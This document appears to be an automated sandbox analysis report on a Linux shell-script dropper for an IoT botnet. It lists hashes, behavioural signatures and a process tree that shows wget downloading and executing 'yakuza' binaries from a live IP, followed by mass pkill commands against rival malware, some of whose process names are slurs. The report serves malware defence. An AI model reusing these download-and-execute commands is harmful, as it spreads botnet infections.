Analysis
-
max time kernel
149s -
max time network
150s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
13-11-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
-
Size
1KB
-
MD5
06e945470e277d1953b8348f96d6bdab
-
SHA1
97c9f6a0ac42ab524a999911fb340a9201eb7f77
-
SHA256
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1
-
SHA512
9296c41fdc556cee147ab81f052d487dcbe9f8ea8227896e3f389f14bebeeaf6b440fb677b3ea33c629430127b4eedf4776bb0576d14c758afd481ee007307ab
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 787 chmod 793 chmod 805 chmod 838 chmod 743 chmod 753 chmod 763 chmod 779 chmod 854 chmod 873 chmod 731 chmod 772 chmod 821 chmod -
Executes dropped EXE 1 IoCs
Processes:
yakuza.mipsioc pid Process /tmp/yakuza.mips 733 yakuza.mips -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
pkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkilldescription ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Processes:
pkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkilldescription ioc Process File opened for reading /proc/78/cmdline pkill File opened for reading /proc/655/cmdline pkill File opened for reading /proc/715/status pkill File opened for reading /proc/37/status pkill File opened for reading /proc/21/status pkill File opened for reading /proc/76/status pkill File opened for reading /proc/124/cmdline pkill File opened for reading /proc/37/status pkill File opened for reading /proc/237/status pkill File opened for reading /proc/74/cmdline pkill File opened for reading /proc/386/status pkill File opened for reading /proc/359/status pkill File opened for reading /proc/73/status pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/10/cmdline pkill File opened for reading /proc/84/status pkill File opened for reading /proc/675/status pkill File opened for reading /proc/708/status pkill File opened for reading /proc/6/status pkill File opened for reading /proc/757/status pkill File opened for reading /proc/16/status pkill File opened for reading /proc/111/cmdline pkill File opened for reading /proc/15/cmdline pkill File opened for reading /proc/76/cmdline pkill File opened for reading /proc/357/cmdline pkill File opened for reading /proc/422/cmdline pkill File opened for reading /proc/715/cmdline pkill File opened for reading /proc/357/status pkill File opened for reading /proc/36/status pkill File opened for reading /proc/381/cmdline pkill File opened for reading /proc/15/status pkill File opened for reading /proc/77/status pkill File opened for reading /proc/747/status pkill File opened for reading /proc/71/status pkill File opened for reading /proc/13/cmdline pkill File opened for reading /proc/386/status pkill File opened for reading /proc/7/status pkill File opened for reading /proc/19/status pkill File opened for reading /proc/124/status pkill File opened for reading /proc/124/status pkill File opened for reading /proc/708/status pkill File opened for reading /proc/6/status pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/78/status pkill File opened for reading /proc/237/cmdline pkill File opened for reading /proc/674/status pkill File opened for reading /proc/111/status pkill File opened for reading /proc/22/cmdline pkill File opened for reading /proc/175/status pkill File opened for reading /proc/6/cmdline pkill File opened for reading /proc/37/status pkill File opened for reading /proc/675/cmdline pkill File opened for reading /proc/74/cmdline pkill File opened for reading /proc/7/cmdline pkill File opened for reading /proc/327/cmdline pkill File opened for reading /proc/175/status pkill File opened for reading /proc/73/status pkill File opened for reading /proc/70/cmdline pkill File opened for reading /proc/4/status pkill File opened for reading /proc/17/status pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/22/cmdline pkill File opened for reading /proc/330/status pkill File opened for reading /proc/21/cmdline pkill -
System Network Configuration Discovery 1 TTPs 9 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
shrmwgetyakuza.mipselrmwgetyakuza.mipspkillbusyboxpid Process 1104 sh 736 rm 737 wget 744 yakuza.mipsel 749 rm 713 wget 733 yakuza.mips 1105 pkill 1106 busybox -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc Process File opened for modification /tmp/yakuza.mipsel wget File opened for modification /tmp/yakuza.sh wget File opened for modification /tmp/yakuza.x86 wget File opened for modification /tmp/yakuza.arm6 wget File opened for modification /tmp/yakuza.ppc wget File opened for modification /tmp/yakuza.i586 wget File opened for modification /tmp/yakuza.m68k wget File opened for modification /tmp/yakuza.mips wget File opened for modification /tmp/yakuza.arm5 wget File opened for modification /tmp/yakuza.arm7 wget File opened for modification /tmp/yakuza.sparc wget File opened for modification /tmp/yakuza.arm4 wget File opened for modification /tmp/yakuza.i686 wget
Processes
-
/tmp/41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh/tmp/41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh1⤵PID:710
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:713
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:733
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:744 -
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵PID:748
-
/usr/bin/pkillpkill -9 902i134⤵
- Reads CPU attributes
- Reads runtime system information
PID:750
-
-
/bin/busyboxbusybox pkill -9 902i134⤵PID:752
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵PID:754
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵
- Reads runtime system information
PID:757
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:759
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵PID:761
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵
- Reads runtime system information
PID:762
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵PID:766
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵PID:769
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵
- Reads CPU attributes
- Reads runtime system information
PID:770
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵PID:771
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵PID:777
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵PID:778
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵PID:780
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:785
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:786
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:790
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:794
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads CPU attributes
PID:797
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:800
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵PID:810
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵
- Reads CPU attributes
PID:811
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵PID:814
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵PID:827
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵
- Reads runtime system information
PID:828
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵PID:831
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵PID:842
-
/usr/bin/pkillpkill -9 scansh44⤵
- Reads CPU attributes
- Reads runtime system information
PID:843
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵PID:847
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵PID:858
-
/usr/bin/pkillpkill -9 MDMA4⤵
- Reads CPU attributes
- Reads runtime system information
PID:860
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵PID:864
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵PID:878
-
/usr/bin/pkillpkill -9 fdevalvex4⤵
- Reads CPU attributes
- Reads runtime system information
PID:881
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵PID:882
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵PID:885
-
/usr/bin/pkillpkill -9 scanspc4⤵
- Reads CPU attributes
PID:886
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵PID:887
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵PID:888
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵PID:889
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵PID:890
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵PID:891
-
/usr/bin/pkillpkill -9 flexsonskids4⤵
- Reads runtime system information
PID:892
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵PID:893
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵PID:901
-
/usr/bin/pkillpkill -9 scanx864⤵PID:903
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵PID:904
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵PID:920
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵
- Reads runtime system information
PID:921
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵PID:923
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵PID:930
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
- Reads runtime system information
PID:931
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵PID:932
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵PID:933
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵PID:934
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵PID:935
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵PID:939
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵
- Reads CPU attributes
PID:940
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵PID:941
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵PID:942
-
/usr/bin/pkillpkill -9 freecookiex864⤵
- Reads CPU attributes
- Reads runtime system information
PID:943
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵PID:944
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵PID:945
-
/usr/bin/pkillpkill -9 sysgpu4⤵
- Reads CPU attributes
- Reads runtime system information
PID:946
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵PID:947
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:948
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
- Reads runtime system information
PID:949
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:950
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵PID:951
-
/usr/bin/pkillpkill -9 frgege4⤵PID:952
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵PID:953
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵PID:954
-
/usr/bin/pkillpkill -9 sysupdater4⤵
- Reads runtime system information
PID:955
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵PID:956
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵PID:957
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵
- Reads runtime system information
PID:958
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵PID:959
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵PID:960
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵
- Reads CPU attributes
PID:961
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵PID:962
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵PID:963
-
/usr/bin/pkillpkill -9 frgreu4⤵PID:964
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵PID:965
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵PID:966
-
/usr/bin/pkillpkill -9 telnetd4⤵
- Reads CPU attributes
PID:967
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵PID:968
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵PID:969
-
/usr/bin/pkillpkill -9 0x766f69644⤵
- Reads CPU attributes
- Reads runtime system information
PID:970
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵PID:971
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵PID:972
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵
- Reads runtime system information
PID:973
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵PID:974
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵PID:975
-
/usr/bin/pkillpkill -9 gaft4⤵
- Reads CPU attributes
PID:976
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵PID:977
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵PID:978
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵
- Reads runtime system information
PID:979
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵PID:980
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵PID:981
-
/usr/bin/pkillpkill -9 120i3UI494⤵
- Reads runtime system information
PID:982
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵PID:983
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵PID:984
-
/usr/bin/pkillpkill -9 OaF34⤵
- Reads CPU attributes
PID:985
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵PID:986
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵PID:987
-
/usr/bin/pkillpkill -9 geae4⤵
- Reads CPU attributes
PID:988
-
-
/bin/busyboxbusybox pkill -9 geae4⤵PID:989
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵PID:990
-
/usr/bin/pkillpkill -9 vaiolmao4⤵
- Reads CPU attributes
PID:991
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵PID:992
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵PID:993
-
/usr/bin/pkillpkill -9 123123a4⤵
- Reads CPU attributes
PID:994
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵PID:995
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵PID:996
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵
- Reads runtime system information
PID:997
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵PID:998
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵PID:999
-
/usr/bin/pkillpkill -9 ggTrex4⤵PID:1000
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵PID:1001
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵PID:1002
-
/usr/bin/pkillpkill -9 wasads4⤵PID:1003
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵PID:1004
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵PID:1005
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵PID:1006
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵PID:1007
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵PID:1008
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵PID:1009
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵PID:1010
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵PID:1011
-
/usr/bin/pkillpkill -9 ggt4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1012
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵PID:1013
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵PID:1014
-
/usr/bin/pkillpkill -9 wget-log4⤵PID:1015
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵PID:1016
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵PID:1017
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1018
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵PID:1019
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵PID:1020
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵
- Reads runtime system information
PID:1021
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵PID:1022
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵PID:1023
-
/usr/bin/pkillpkill -9 ggtq4⤵
- Reads runtime system information
PID:1024
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵PID:1025
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵PID:1026
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵
- Reads runtime system information
PID:1027
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵PID:1028
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵PID:1029
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1030
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵PID:1031
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵PID:1032
-
/usr/bin/pkillpkill -9 ggtr4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1033
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵PID:1034
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵PID:1035
-
/usr/bin/pkillpkill -9 14Fa4⤵PID:1036
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵PID:1037
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵PID:1038
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵
- Reads runtime system information
PID:1039
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵PID:1040
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵PID:1041
-
/usr/bin/pkillpkill -9 ggtt4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1042
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵PID:1043
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵PID:1044
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵PID:1045
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵PID:1046
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:1047
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads CPU attributes
PID:1048
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:1049
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵PID:1050
-
/usr/bin/pkillpkill -9 haetrghbr4⤵PID:1051
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵PID:1052
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵PID:1053
-
/usr/bin/pkillpkill -9 19ju3d4⤵PID:1054
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵PID:1055
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵PID:1056
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵
- Reads CPU attributes
- Reads runtime system information
PID:1057
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵PID:1058
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵PID:1059
-
/usr/bin/pkillpkill -9 hehahejeje924⤵
- Reads CPU attributes
PID:1060
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵PID:1061
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵PID:1062
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵
- Reads CPU attributes
- Reads runtime system information
PID:1063
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵PID:1064
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵PID:1065
-
/usr/bin/pkillpkill -9 SlaVLav124⤵PID:1066
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵PID:1067
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵PID:1068
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵
- Reads runtime system information
PID:1069
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵PID:1070
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵PID:1071
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵
- Reads runtime system information
PID:1072
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵PID:1073
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵PID:1074
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1075
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵PID:1076
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵PID:1077
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵
- Reads runtime system information
PID:1078
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵PID:1079
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵PID:1080
-
/usr/bin/pkillpkill -9 5Gbf4⤵
- Reads CPU attributes
PID:1081
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵PID:1082
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵PID:1083
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵PID:1084
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵PID:1085
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵PID:1086
-
/usr/bin/pkillpkill -9 iaGv4⤵PID:1087
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵PID:1088
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵PID:1089
-
/usr/bin/pkillpkill -9 5aA34⤵
- Reads runtime system information
PID:1090
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵PID:1091
-
-
-
/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵PID:1092
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵PID:1093
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵PID:1094
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵PID:1095
-
/usr/bin/pkillpkill -9 insomni4⤵
